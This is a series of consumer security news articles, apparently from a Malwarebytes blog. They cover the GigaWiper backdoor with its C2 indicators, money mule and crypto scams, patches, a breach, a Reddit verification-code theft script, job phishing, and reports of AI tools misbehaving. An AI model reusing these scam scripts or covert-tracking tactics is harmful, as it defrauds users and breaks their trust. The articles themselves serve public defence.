Malware Bytes
This new Windows malware can take over your PC and wipe it clean
Microsoft published new research on GigaWiper, a modular Golang backdoor for Windows that combines robust remote access with multiple ways to permanently destroy systems and data.
GigaWiper is a Windows backdoor that Microsoft has observed in intrusions since October 2025. Rather than being a single-purpose wiper, it’s an operational platform that blends command‑and‑control (C2), data destruction, and remote access options in a single piece of malware.
What’s remarkable is that GigaWiper seems to be built using previously separate tools like the Crucio ransomware and the FlockWiper disk wiper, wrapped into a consolidated framework.
Based on the characteristics of the malware, which include espionage features (screen capture, VNC‑like remote control, system inventory) and multiple ways to irreversibly destroy data, it fits the pattern of an attacker that wants long‑term access but also reserves the option to wipe systems if they choose.
GigaWiper implements about 20 commands, falling broadly into three categories: destruction, remote access/monitoring, and system management. Some examples include:
- Raw disk wiper that overwrites raw disk content in large chunks before forcing an immediate reboot.
- Fake ransomware (Crucio‑based) wiper that masquerades as ransomware. Instead of demanding payment, it encrypts files and then throws away the encryption key, making recovery impossible.
- Windows drive secure wiper that targets the Windows installation drive and performs multi‑pass overwrites using different byte patterns.
- Screen capture and recording, including one‑shot screenshots of each monitor and continuous recording while the user is active.
- Remote control via a TCP (Transmission Control Protocol) server that streams the desktop and allows keyboard and mouse input after creating its own Windows Firewall exceptions.
GigaWiper also sets up a scheduled task called “OneDrive Update” that runs every minute and at startup to maintain persistence.
Command-and-control servers were found at 185.182.193[.]21 and 212.8.248[.]104.
Malwarebytes blocks the C2 connectionsIts management utilities include process, service, and registry managers that can create, list, or kill processes, manage Windows services, and navigate and mutate registry keys. It also collects system information, including hardware, operating system, network, firmware, user, and antivirus details.
How to stay safeBecause GigaWiper is deployed after attackers have already compromised a system, the best defence is preventing the initial intrusion and detecting malicious activity before destructive commands can be executed.
Malwarebytes detects GigaWiper components with the detection names Trojan.FlockWiper and Backdoor.GigaWiper.
- If GigaWiper is detected, disconnect the affected machine from the network immediately to prevent attackers from initiating destructive commands.
- Enable tamper protection (or the equivalent feature in your security software) so local admins and malware cannot silently disable anti-malware or other security tools.
- Monitor for connections to the known C2 servers, the creation of the “OneDrive Update” scheduled task, and unauthorized attempts to disable Windows recovery.
- Finally, rotate credentials, particularly for any accounts that may have been compromised, and review logs for privilege escalations or lateral movement to determine if other systems have also been affected.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
How mule betting scams recruit ordinary people
Mule betting or third-party betting account scams are a form of money mule scam where criminals recruit or coerce people into opening gambling accounts in their own name. The criminals then use those accounts to place bets to help launder money and obscure the source or ownership of funds.
The UK Gambling Commission describes “mule” betting accounts as online betting accounts created using another person’s personal details, with or without that person’s knowledge. It says criminals can control large numbers of these accounts to disguise who is betting and where the money came from. The Commission also warns that criminals may move illicit funds through third-party bank accounts to break the audit trail, often targeting vulnerable people and university students.
A common pattern is that the scammer offers easy money, “helps” the victim open an account, or claims they can’t use their own identity. That matches broader money mule recruitment tactics, where criminals approach people online, promise quick cash, and use the victim’s account to move or launder funds.
Barclays defines a money mule as:
“A money mule is someone who lets criminals use their bank account to move money. Often the mule doesn’t know what’s really happening, and has been manipulated into believing a cover story, or lured by an offer of payment.”
A UK study published in 2025 found that 21% of adults had been asked to receive money into their bank account, apply for a loan on someone else’s behalf, or open a new account—all in exchange for cash.
Mule betting is a specialized form of money mule scam. As well as helping to hide the source and destination of criminal funds, these accounts can also end up being involved in betting-related crime, including match fixing.
It is important to realize that by acting as a money mule, you’re getting involved with organized crime. In the US, money mules can face criminal prosecution, and authorities warn that claiming “you didn’t know” is not always a defense.
The FBI says common targets include students, job seekers, and people using dating sites. The “mule herder” usually promises easy money, then quickly asks the victim to open a bank or betting account or receive and transfer money on their behalf. Money gets deposited into that account from a fraud victim, a stolen source, or another mule who is a link in the chain.
The criminal then uses the account to place bets, move funds, or cash out in ways that make the money appear to be gambling winnings rather than the proceeds of fraud.
The key gain for the criminals is layering: each extra account, bet, transfer, or cash-out step makes the money harder to trace. On paper, the account holder appears to be the person carrying out the transactions, even though someone else is controlling the account.
From the victim’s perspective, it can look like a legit side hustle at first: easy money, simple tasks, and a promise they can keep a percentage. After that, the requests usually escalate into more frequent transfers, identity verification, sending card details, or handing over full control of the account.
How to stay safeLike many scams, money mule schemes often start with small, seemingly harmless requests before escalating. The safest approach is simple: if someone asks you to move money in exchange for an easy reward, assume it’s a scam unless you can independently prove otherwise.
- Never use your own bank account to move money for someone else. Legitimate employers or businesses do not ask you to receive and forward funds through your personal account. This is a common follow-up tactic in romance, friendship, and job scams.
- Be skeptical of easy-money offers, especially “work-from-home” jobs that promise quick pay for simple transfers. If it sounds too good to be true, it usually is.
- Research any company or person making the offer before you respond. Check that the business is real, registered, and traceable, and be extra cautious with overseas or hard-to-verify contacts.
- Never share banking details, passwords, PINs, or one-time passcodes with anyone you do not fully trust. Protecting access to your accounts helps block both coercion and takeover attempts.
- Monitor your accounts regularly and act fast on unexpected deposits or suspicious requests. If money appears out of nowhere, do not touch it; contact your bank immediately.
Pro tip: If someone contacts you out of the blue, Malwarebytes Scam Guard can help you determine whether it’s a scam.
Something feel off? Check it before you click.Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.
Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
Two Chrome updates in two days fix critical vulnerabilities
Updating Chrome is becoming an almost daily task lately. But it’s too important to ignore.
On Wednesday, July 8, Google released another Chrome update, just one day later after the previous one.
Between them, the two updates fixed 27 security vulnerabilities, including two critical flaws that could be exploited to compromise Chrome. Google says both are “use-after-free” memory vulnerabilities, which can sometimes allow attackers to run malicious code. Google has not reported any of these vulnerabilities as being actively exploited.
The Stable channel has been updated to 150.0.7871.114/.115 for Windows and macOS, and 150.0.7871.114 for Linux. The updates will roll out over the coming days and weeks.
How to update ChromeIf you don’t want to wait for the rollout to reach you, manually updating is easy.
The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you rarely close your browser or if something goes wrong, such as an extension preventing the update.
To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it automatically. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.
Chrome 150.0.7871.115 is up to dateYou can find an explanation of the version numbering system and step-by-step instructions in our guide to how to update Chrome on every operating system.
The version numbering systemWith updates arriving within days of each other, it’s helpful to understand Chrome’s version numbering system so you can quickly tell whether you’re running the latest release.
The Chrome version number consists of four parts separated by dots, like this:
MAJOR.MINOR.BUILD.PATCH
Each part has a specific meaning. In order of relevance they are:
- MAJOR: This number increases with each major Chrome release, which may include new features or changes.
- MINOR: This number is typically zero and rarely changes. It mainly supports the versioning scheme but doesn’t usually affect how users track updates.
- BUILD: This number increases steadily and identifies a specific build of Chrome’s source code. When comparing versions, it is the first number to check after the major version.
- PATCH: This number increases as Google releases smaller fixes and security updates for a particular build. It resets with each new build and helps identify minor updates within the same build.
For example, a version like 137.0.7151.56 means:
- Major version 137 (the milestone release)
- Minor version 0 (almost always 0)
- Build number 7151 (the code snapshot)
- Patch number 56 (the latest fix for that build)
The BUILD and PATCH numbers together identify the exact version of Chrome you’re running. Even if two versions share the same major number, higher build or patch numbers means you have a newer, more up-to-date Chrome version.
Sometimes you might see slightly different patch numbers on the same major build, for example, 118.0.5993.117 vs. 118.0.5993.118. This usually happens because Google released a quick fix or minor patch shortly after the initial release. Both are part of the same major update, but the higher patch number is newer.
How to check if you have the latest versionTo verify your Chrome version:
- Open Chrome.
- Click the three-dot menu (⋮) in the top-right corner.
- Go to Help > About Google Chrome.
Chrome will display your current version and automatically check for updates. If an update is available, it will download automatically and prompt you to restart your browser.
Stop threats before they can do any harm.
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
How World Cup crypto prediction sites take your money
Crypto prediction and betting sites are appearing around the World Cup, and researchers have already tracked scams aimed at fans, including fake ticketing, fixed-match betting, prediction scams, and fan-branded meme coins.
We investigated one prediction site ourselves. While we aren’t claiming every site works the same way, it matched several well-known scam patterns. Whether it’s a worthless token, a fake betting platform, or a disappearing website, the result is often the same: you lose money.
What you need to know- This isn’t a single scam. Different sites use different tactics, but many follow the same playbooks.
- Even if a site pays out exactly what it promises, you could receive a token that’s difficult or impossible to sell.
- Some sites simply keep your deposit and stop responding.
- Crypto transactions generally can’t be reversed. Once you’ve sent the money, recovering it may be impossible.
The last three examples below are based on a token we investigated directly. The first two are common scam patterns seen across this category.
- Pump-and-dump: A token is promoted through the game, early participants receive genuine payouts that build trust, then the creators sell their holdings and the price collapses. Later buyers are left with a token few people want.
- Take the money and vanish: You deposit crypto to unlock betting or enter the game. The site keeps the money and disappears.
- Fake free-to-play: The game is advertised as free, but you have to buy or hold a token before you can participate. The game attracts users; the token sale generates revenue.
- Copycat naming: A new token uses a name similar to an established cryptocurrency, making it easier for people to mistake it for a legitimate project.
- Manufactured activity: The same tokens move repeatedly through a central wallet, creating the appearance of trading activity. On charts, it can look like an active market when little genuine trading is taking place.
You’ve probably heard advice like “never share your seed phrase.” That’s still important, but it isn’t what’s happening here.
These sites don’t need access to your wallet or seed phrase. They persuade you to send money voluntarily. Once you’ve done that, there may be nothing to recover.
How to check a token- Look at how many people actually hold the token. A token with very few holders, despite lots of apparent trading, deserves extra scrutiny.
- Check the transfer history, not just the trading volume. On one token we examined, identical amounts repeatedly moved into and back out of the same central wallet. We confirmed this pattern across more than a dozen addresses. Genuine market activity rarely produces repeated matching round trips like this.
- Search the token name alongside “price.” If a similarly named cryptocurrency already exists, you may be looking at a copycat.
- Before sending money, ask yourself what happens if you never see it again. If you aren’t comfortable with that answer, don’t send it.
- Don’t send more to unlock a refund or payout. That’s often part of the scam.
- Assume the money may be gone. Waiting for the site to make things right rarely works.
- Disconnect unfamiliar apps, then revoke any spending permissions you granted. Disconnecting a wallet from a site doesn’t necessarily revoke any spending approvals you’ve already granted. Check your wallet’s support pages for instructions on reviewing and revoking those permissions.
- Report the scam to help protect others:
- Report the website to your country’s cybercrime reporting service or consumer protection agency.
- Report the wallet address if the wallet or exchange you use provides an abuse reporting option.
- If you found the site through social media or a search engine, report the post or advert so it can be reviewed.
Whether the site pays you in a token that quickly becomes worthless or simply disappears with your deposit, the outcome can be much the same.
If a crypto prediction game asks you to buy or hold a token before you can play, stop and ask why. The game may be there to encourage token sales rather than reward successful predictions.
Stop threats before they can do any harm.
Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →
6.9 million driver’s license numbers stolen from AssuranceAmerica
Insurance provider AssuranceAmerica has confirmed a data breach affecting the personal information and driver’s license numbers of up to 6.9 million people.
AssuranceAmerica provides car and rental insurance to customers across 14 US states through a network of over 9,500 independent agents.
TechCrunch reports:
“AssuranceAmerica said it discovered hackers in its computer systems on March 17. The company concluded its investigation on June 15, finding that the hackers had stolen customers’ names, contact information, and driver’s license numbers.“
The breach notice letter also mentions information about customers’ auto insurance policies and accounts, their drivers and vehicles, and details about customer claims.
AssuranceAmerica has not yet released a public statement about the data breach. However, public breach notices and independent reporting indicate that the incident began with a targeted phishing attack against a single employee. An unauthorized third party accessed parts of the insurer’s IT systems and copied files containing customer policy information and driver’s license numbers. So far, no law‑enforcement or vendor report has publicly linked this activity to a specific threat group, ransomware operation, or nation‑state actor.
No public source has reported a ransom demand, negotiations, or payment, and AssuranceAmerica’s public filings are quiet about any contact with the attackers.
Protecting yourself after a data breachThere are some actions you can take if you are, or suspect you may have been, the victim of a data breach.
- Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
- Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose and store one for you.
- Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop, or phone as your second factor. Some forms of 2FA can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
- Watch out for impersonation scams. Criminals may contact you pretending to be the company. Check the company’s website to see how it is contacting affected customers, and verify anyone who contacts you using a different communication channel.
- Take your time. Phishing attacks often impersonate people or brands you know, and create a false sense of urgency with messages about missed deliveries, suspended accounts, or security alerts.
- Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
- Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online and helps you recover if your identity is stolen.
You can check whether any of your personal information has been exposed using our Digital Footprint portal. Enter the email address you use most often and we’ll generate a free Digital Footprint report.
Scan Please enter a valid email addressMicrosoft fixes RoguePlanet zero-day in Defender
Microsoft issued a security update that fixes the zero-day vulnerability known as RoguePlanet in Microsoft Defender.
RoguePlanet is tracked as CVE-2026-50656, a Microsoft Defender elevation of privilege (EoP) vulnerability. As we reported last month, if successfully exploited, RoguePlanet can allow an attacker to elevate privileges from a standard user account to NT AUTHORITY\SYSTEM, the highest privilege level on Windows.
This means an attacker who gains access to a standard user account on your computer could use the vulnerability to take complete control of the system. They don’t need advanced hacking skills or administrator permissions to do this.
Microsoft fixed the vulnerability by releasing Microsoft Malware Protection Engine version 1.1.26060.3008, an update to the core scanning engine that powers Microsoft Defender and other Microsoft security products.
How to protect your systemIf Windows Security shows that another antivirus, such as Malwarebytes, is protecting your PC and Microsoft Defender Antivirus is turned off (as shown below), this particular vulnerability does not affect your system. Defender’s scanning engine isn’t running, so it can’t be exploited through this flaw.
If you’re running another antivirus and Defender is turned off, there’s nothing to worry about Most users are already protectedBy default, Microsoft Defender automatically updates both its malware definitions and the Microsoft Malware Protection Engine.
But if you’re in any doubt, you can check the version of the Malware Protection Engine on your system. Here’s how:
- Click the Start button, type Security, and choose Windows Security from the results.
- Select Virus & threat protection, then under Virus & threat protection updates, click Check for updates.
- Click Settings (the cog icon) then select About.
- Look for a line called Engine Version. That number is the version of the Malware Protection Engine used by Microsoft Defender.
- If your Engine Version is 1.1.26060.3008 or higher, your system has the patched (or newer) engine.
- If your Engine Version is 1.1.26050.11 or lower, your system is still running a vulnerable engine. Run Windows Update and check for Defender updates again, or wait for the automatic update to complete.
Note: Version numbers are compared from left to right. For example, 1.1.26060.3008 is newer than 1.1.26050.11 because 26060 is higher than 26050.
If you use Windows Defender, leave automatic updates turned on. The Malware Protection Engine normally updates automatically, so most home users will receive the fix without doing anything. These steps are simply a way to double-check your system has the updated engine.
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
Turn off this Meta setting before someone generates AI images of you
Every consumer app has a settings menu that lets you make decisions about things like notifications or dark mode. Meta has just decided that anyone can generate AI images of you from your public Instagram account by typing your Instagram handle into a prompt.
On July 7, Meta launched its AI image generation model, Muse Image. It integrates with public Instagram accounts. Now, all someone has to do is tag your account in a prompt, and they can use Meta AI to generate an image using your likeness. According to Meta’s own policy, you won’t be notified if someone does this, making it difficult to know when or how your likeness has been used.
Meta says Muse Image is meant to make AI image generation more personal by letting people reference public Instagram accounts in their prompts. That may sound fun when you’re creating images of yourself. It’s less appealing when anyone else can do the same with your account.
Meta lets you opt out, although finding the setting is its own adventure. On Instagram, go to Settings and activity > Sharing and reuse, then turn off the setting that allows others to create AI images featuring you. Depending on your app version, the wording may vary, and the feature is still rolling out, starting in the US, so you may not see the setting yet.
You’d hope that Meta would tell you up front with a big, bold “Turn this off if you don’t want it” message when you open Instagram, but no such luck. You’d also hope that the company would retroactively remove any images that someone made of you before you opted out, but that’s not happening either.
Opting out only prevents future image generation. Any AI images that someone created before you switched the setting off still remain in circulation.
The only mechanism that comes close to comprehensive protection is switching your account to private.
What’s the risk?There are privacy and security implications here. Anyone can now generate AI images based on your public Instagram profile without your knowledge, and Meta won’t notify you when it happens. Public Instagram photos were already being harvested by attackers to create deepfakes for identity verification fraud. Giving people an official way to generate AI images based on public profiles lowers the barrier to creating synthetic images that could be used for impersonation, scams, or other abuse.
Cybercriminals are already combining generative AI with automated tools to scale phishing and fraud. Muse Image makes it even easier to generate convincing images based on public identities.
Meta’s AI has introduced other security issues, too. Earlier this year, researchers disclosed a “confused deputy” flaw in Meta’s AI support chatbot that let it make account changes—including changing email addresses and resetting passwords—without adequately verifying who it was talking to. Enabling multi-factor authentication (MFA) appeared to mitigate that issue.
Meta also uses an opt-out approach when training its AI on European user data. The company relies on GDPR’s “legitimate interests” legal basis to process European users’ data for AI purposes, a position that privacy group NOYB has challenged.
Protect yourself- If your Instagram is public, open Settings and activity > Sharing and reuse and turn off the AI-generation toggle now. Remember, it only stops future image generation.
- Turn on MFA for all your Meta accounts. It’s one of the simplest ways to protect your account if your password is compromised.
- If you want the strongest protection Meta currently offers, switch your Instagram account to private. It’s a blunt solution, but it prevents strangers from using your public profile as source material.
Meta’s own Oversight Board has already said the company needs stronger detection tools and better labeling of AI-generated content. When Meta’s own governance body says the defenses aren’t enough, consumers should take notice.
Scammers don’t need to hack you. They just need you to click once.
Malwarebytes Identity Theft Protection catches suspicious activity before it becomes a problem.
Your next car could be watching your face
To reduce traffic incidents, all new cars sold in the EU must now include driver-monitoring technology, including Driver Drowsiness and Attention Warning (DDAW) systems and, on newer vehicles, Advanced Driver Distraction Warning (ADDW) systems.
Similar requirements are expected in the US, where the National Highway Traffic Safety Administration (NHTSA) has been directed to develop rules requiring advanced impaired driving prevention technology in new passenger vehicles.
The EU requirement took effect on July 7, 2026. In the US, Section 24220 of the 2021 Infrastructure Investment and Jobs Act requires NHTSA to finalize regulations for “advanced impaired driving prevention technology.”
While camera-based systems are widely expected, the law does not specify exactly how manufacturers must implement the technology. Many current systems use infrared cameras to monitor the driver’s face and eyes for signs of drowsiness, distraction, or possible impairment.
Privacy experts raised alarms and they are not alone. Mandated driver‑monitoring tech in new cars raises a set of privacy, security, and civil‑liberties objections.
Reported concerns include:
- Always‑on biometric surveillance in private space. Infrared cameras and other sensors can continuously track eye movement, pupil dilation and drowsiness patterns, effectively turning your car into a space where biometric assessment is constantly being assessed.
- Unclear data flows and potential sharing with insurers. While the law does not explicitly mandate external data sharing, manufacturers could potentially upload biometric data to corporate servers. Critics have also raised concerns that it could eventually be shared with insurance companies to adjust premiums based on driving behavior. It’s not like that hasn’t happened before.
- Higher vehicle costs. The added cost of $100 to $500 per vehicle is likely to be passed on to consumers already dealing with inflated car prices, not the insurance companies that could benefit from fewer accidents and lower pay-outs.
- Reliability and false positives. Automakers are concerned about technical readiness and false positives that could strand drivers if the system incorrectly decides they’re impaired. Experts worry that poorly tuned models could misclassify fatigue, disability‑related eye/face patterns, or even momentary distraction as impairment, leading to denial or limitation of vehicle operation.
- Scope changes through software updates. These systems will be integrated into broader automotive software stacks and may be receive over-the-air updates, potentially expanding their monitoring capabilities after purchase.
Other experts have questioned whether the technology was was ready for widespread deployment, including in NHTSA’s 2023 report to congress.
Even Mothers Against Drunk Driving (MADD) warns that:
“The vehicle technology standard must protect driver privacy and should not make consumers vulnerable to privacy invasions or allow the collection, storage or use of their data for commercial or malicious purposes.”
What you can doBesides adjusting when you buy a new car, there are some things consumers can do:
- When shopping, look for manufacturer privacy documentation specifying that driver‑monitoring data is processed locally, not stored long‑term, and not shared with third parties except where strictly necessary for safety.
- Ask the dealer how long biometric data is retained, whether it leaves the car, and whether you can disable cloud connectivity for these features while keeping basic safety functions.
- Where possible, disable optional driver-scoring, eco‑driving, or usage‑based insurance features that piggyback on the same sensor data.
- When given the choice, choose the strictest privacy settings you can legally use.
- In some countries and states, privacy laws give you the right to know what data is collected, request its deletion, and opt out of certain types of data sharing.
- Be cautious about opt‑in programs that promise discounts or perks in exchange for sharing detailed driver‑monitoring data with insurers or employers.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
How the Reddit and Discord false report scam steals accounts
A stranger messages you on Reddit. They say someone reported them, and the reporting account looks a lot like yours. Was it you?
It wasn’t. That’s not really the point of the message.
This version relies entirely on social engineering. There is no malware and no malicious links. It starts with a conversation, but the goal is to trick you into handing over a login or verification code so the scammer can access your Reddit account.
How this scam worksThere are two common variants of this scam:
- “Someone reported me, and it looks like it was you.”
- “I accidentally reported your account.”
Someone claims there was a mistake involving a report. In one version, they say someone reported them and it looks like it was you. In another, they claim they accidentally reported your account and need your help to fix it. Either way, there’s no report. It’s the opening to a social engineering scam that has become common on Discord, Reddit, and other platforms.
The end goal varies. Some versions try to trick you into sharing a login or verification code so the scammer can sign in to your account, change your password, and lock you out. Others persuade you to change the email address linked to your account to one they control. They then demand a gift card or other payment to “fix” the problem, threatening to delete your account or use it to scam other people if you don’t pay.
If you’re still talking to them, stop and don’t share any codes or change your account details. If you’ve already done either and lost access to your account, skip ahead to How to protect yourself below.
How it plays outThe conversation usually starts with one of two claims. Either the person says someone reported their account and it looks like it was you, or they claim they accidentally reported your account by mistake.
If you deny it, the scammer doesn’t argue. They say it was probably an honest mistake and keep the conversation going. They might ask if you know who reported them or suggest you can help clear things up. The goal is simply to keep you engaged.
Then they send “proof”: a screenshot of an email made to look as though it’s from Reddit. It has a formal tone, a ticket number, a claim that a “formal investigation” is underway, and a countdown, usually 12 hours, before “suspension, limited features, or a ban.” Some versions tell you to contact someone on Discord who claims to be a Reddit employee or moderator. Others include a fake legal warning that cites laws or regulations unrelated to the situation. None of it is real.
Why this isn’t how Reddit worksReddit doesn’t ask people involved in a report to contact each other, and it doesn’t ask you to verify your account through a stranger in a direct message. It doesn’t handle appeals through Discord or direct you to a staff member’s personal Discord account. Reports, moderation, and appeals all happen through Reddit itself.
The countdown is there to create urgency. Combined with vague threats of suspension, restricted features, or a ban, it’s designed to make you act before you have time to question what’s happening.
What they’re actually afterThe report and the fake email are just the setup. The scammer tells you that a Reddit employee or “supervisor” needs to verify your account to prove you weren’t involved. To do that, they say, you need to read back the code Reddit is about to send you.
While you’re in the conversation, the scammer tries to sign in to your real account or trigger an account recovery. Reddit responds by sending a genuine login or verification code to you.
The timing isn’t a coincidence. The code arrives just after you’ve been told to expect it. If you read it back, the scammer can use it to sign in to your account, change your password, and lock you out. The code itself is real. The story around it is the scam.
Why people fall for itWhether you’ve been accused of reporting someone or told your account was reported by mistake, the scam puts you in a position where you want to fix the problem. So when you’re asked to “verify” your account, it can feel like part of resolving the issue rather than a security risk.
The fake email makes the story seem more believable, especially if you don’t stop to question whether the contact method or process matches how Reddit actually works. The countdown adds a sense of urgency, encouraging you to act before you’ve had time to think it through.
This isn’t about being gullible. It’s a well-rehearsed social engineering script designed to make a reasonable request seem legitimate.
It’s not just direct messagesWhile the false-report scam usually starts in a direct message, scammers also impersonate Reddit in phishing emails claiming your account has been locked or needs attention. If you receive an unexpected security email, don’t click the links inside it. Instead, sign in to Reddit directly through the official website or app.
If your account is compromised, you may notice posts, comments, or messages you didn’t create. That’s a sign someone else has access to your account. If that happens, change your password, enable two-factor authentication if you haven’t already, and follow Reddit’s account recovery process.
How to protect yourself- Never share a Reddit login or verification code with anyone, even someone claiming to be Reddit staff or support.
- Never change the email address linked to your account at a stranger’s request, even to “fix” a reported issue.
- If someone asks you to buy a gift card or send money to resolve a report, it’s a scam.
- Reddit won’t ask users involved in a report to contact each other, verify their accounts through direct messages, or handle appeals through Discord.
- If you receive an unexpected Reddit security email, don’t use the links inside it. Sign in to your account directly through reddit.com or the official app instead.
- Turn on two-factor authentication using an authenticator app, and treat any unexpected login or verification code as a sign someone may be trying to access your account.
- If you notice posts, comments, or messages you didn’t create, secure your account immediately by changing your password. If you’ve lost access, use Reddit’s official account recovery process at reddit.com.
- Report the scammer and their messages using Reddit’s built-in reporting tools.
If someone asks you to share a login or verification code, stop there. That’s the scam. Everything before it is just the setup.
Fake Netflix, Coca-Cola, and FIFA job scams target marketers
Attackers are impersonating major companies and recruiters to target marketing professionals, using trusted services and browser tricks to make the scam look legitimate.
A BleepingComputer article detailing the campaign found at least 34 domains impersonating high-value companies, including Netflix, Coca-Cola, Adidas, and FIFA.
The lure is a fake job interview or scheduling request from a “recruiter” representing one of these major companies. The impersonating website then shows the victim a fake Google sign-in pop-up built inside the page, rather than a real browser window.
To avoid detection, the attackers route victims through a chain of legitimate services before they reach the phishing site. So, instead of going straight from A to D, you go A → B → C → D. In phishing, attackers use this to make the final malicious site look less suspicious, because the victim passes through legitimate-looking services first.
“The operation is abusing the legitimate cloud-based PeopleForce human resources platform and a domain associated with the Salesforce Marketing Cloud service before redirecting the recipient to a malicious landing page.”
BleepingComputer noted that the campaign has been running for at least five months and primarily targets people in marketing roles. We know from our own investigations that job-themed phishing is extremely common and is likely especially effective while entry-level positions remain highly competitive and AI continues to shape the job market.
How to stay safeCampaigns like these show how AI-enabled scams reshape scams, identity theft, and the ways attackers exploit trust.
As Stefan Dasic wrote in a post about a similar campaign that phished for Facebook credentials:
“The best protection isn’t spotting the fake—it’s knowing that no legitimate hiring process will ever require you to authenticate through an unfamiliar page, whether it’s dressed up as Google, Facebook, or anything else. When in doubt, close the tab, go to the company’s website yourself, and apply the old-fashioned way.”
Other useful tips include:
- Don’t click links or open attachments in unsolicited job offers.
- Use a password manager. It won’t autofill your Google username and password on a fake website.
- Use an up-to-date, real-time anti-malware solution with web protection.
Pro tip: Malwarebytes Scam Guard would have helped identify this attack as a scam.
Something feel off? Check it before you click.Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.
Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.
Claude Code’s hidden tracker was an “experiment,” says Anthropic
As a developer, you want to use tools you can trust and rely on. One researcher took that idea seriously enough to scrutinize their local Claude Code (2.1.196) installation. For developers using AI assistants with access to their code, files, and terminal, understanding what those tools are doing behind the scenes is becoming just as important as evaluating their coding abilities.
When you give an AI coding assistant shell, filesystem, and repository access, you’re already taking a calculated risk. You expect bugs, maybe even some telemetry, but not a hidden channel that quietly encodes where your traffic is going and who might be watching on the other end.
That is exactly what independent developer “Thereallo” found while reverse‑engineering Anthropic’s Claude Code client. Buried in the minified JavaScript bundle was a function that took the otherwise innocuous line “Today’s date is 2026‑06‑30.” and turned it into a stealth marker for Anthropic’s back end, depending on the user’s API endpoint and system time zone.
To users and most developers reading logs, the text still looked like ordinary English. Only someone inspecting the raw Unicode or Anthropic’s own back end would see the encoded signal triggered if the local time zone was set to Asia/Shanghai or Asia/Urumqi.
Once the revelation spread via social media and news outlets, Anthropic acknowledged the code and moved quickly to remove it, but has not yet issued a detailed public postmortem dedicated to this feature.
Reportedly, an Anthropic engineer confirmed on X that the marker was “an experiment we launched in March” intended to prevent account abuse by unauthorized resellers and to protect against distillation. This may have been triggered by the US government’s decision on June 12 to suspend access to the models for foreign nationals, citing national security concerns. These export controls were lifted on June 30.
Another possible reason might be to learn more about reported Chinese distillation attacks, which pose a serious threat to US national security and undermine AI safety standards.
Who needs to worryAnthropic has been locked in a very public dispute over “distillation attacks.” These are campaigns in which adversaries allegedly replay or proxy model outputs to train competing systems, often from jurisdictions with weaker IP protections. Chinese‑linked AI labs and intermediaries have featured prominently in those accusations, and news reports describe unauthorized retailers reselling Claude access at steep discounts.
Alibaba has already banned Claude Code over this matter. Alibaba is not only one of the world’s largest retailers and ecommerce companies, but was also ranked the world’s fifth-largest artificial intelligence company in 2020.
Developers who are concerned they could be targeted can:
- Record hashes and versions of AI clients used in sensitive environments, and avoid auto‑updates without at least a cursory review.
- Use network inspection to capture full requests to AI APIs in test environments, then analyze them for hidden or unexpected markers, including Unicode anomalies in system prompts.
As this case shows, a single vendor decision can make a previously trusted tool unacceptable for some organizations. Maintain optionality and avoid hard dependencies on one AI assistant.
Browse like no one’s watching.
Malwarebytes Privacy VPN encrypts your connection and never logs what you do, so the next story you read doesn’t have to feel personal. Try it free →
Scammers are using AI to sell impossible flowers
We’ve had problems with deepfake celebrity scams, non-consensual deepfake sexual material, and deepfake politicians. Now we have to deal with… deepfake plants?
Yup, AI seed slop is now a thing. 404 Media documented scammers marketing seeds for plants that supposedly bloom in the shape of birds, butterflies, and cat heads, complete with technicolor leaves and impossible color gradients. The listings appear on eBay, Amazon, and Etsy, and the platforms are struggling to keep up. The plants never existed, except as some get-rich-quick merchant’s fever dream.
Don’t confuse this seed scam with the unsolicited seed incident that the FTC warned about in 2020. In that case, people received packets of seeds in the mail that they never ordered.
That was a “brushing” scam, in which scammers would send out low-value packets of seeds to unwitting recipients. This allowed them to register those people as verified purchasers on ecommerce platforms so they could use their accounts to create fake reviews for likely fake products. The confused “customers” were left none the wiser.
Those scammers were after verified purchaser status. This time around, the seeds themselves are the cash grab. This means they need to look visually intriguing and appealing.
AI makes that much easier. A scammer who once needed to Photoshop a fantasy flower onto a real photograph can now type a prompt into an AI engine and get a photorealistic bloom in seconds. That means they can generate hundreds of these nonsensical flora images with next to no effort.
Scamming victims for a few bucks at a timeThat AI capability lets scammers level up low-value rip-offs with ease. We don’t imagine that people are handing over their life savings for these seeds. Sure enough, after 20 seconds of searching, we found a dubious post on a popular ecommerce platform from a seller in Shenzhen offering cat-face flower seeds for the equivalent of around $5.75.
Even if someone orders multiple packets, we still imagine most individual seed scams will fall within the 23% of fraud incidents that Gallup says involve losses of under $100. While crypto investment scams often deliver big payoffs for criminals, there’s clearly money to be made from high-volume, low-value ecommerce scams too.
Oh, why did we find the seller’s ad to be suspicious? Here’s why:
“Cat’s face orchids” being sold on eBay, Amazon, and EtsyYes, cat-faced orchids are technically a real thing, which makes things trickier. The petals can resemble whiskers, and the markings can look a bit like eyes and a nose. But they actually look like the one below, not the deranged, psychedelic wonder above. If you think that’s an actual flower, we have some magic paperclips to sell you.
Huntleya burtii: the real “cat’s face orchid” What buyers can actually doDetection is still visual, not forensic. No stamp guarantees a flower is real. A few things do help:
- The most effective check is common sense. Just because something melts your heart doesn’t mean it should open your wallet. Once again, we refer you to the picture above. So take a breath and ask yourself if it really seems legit.
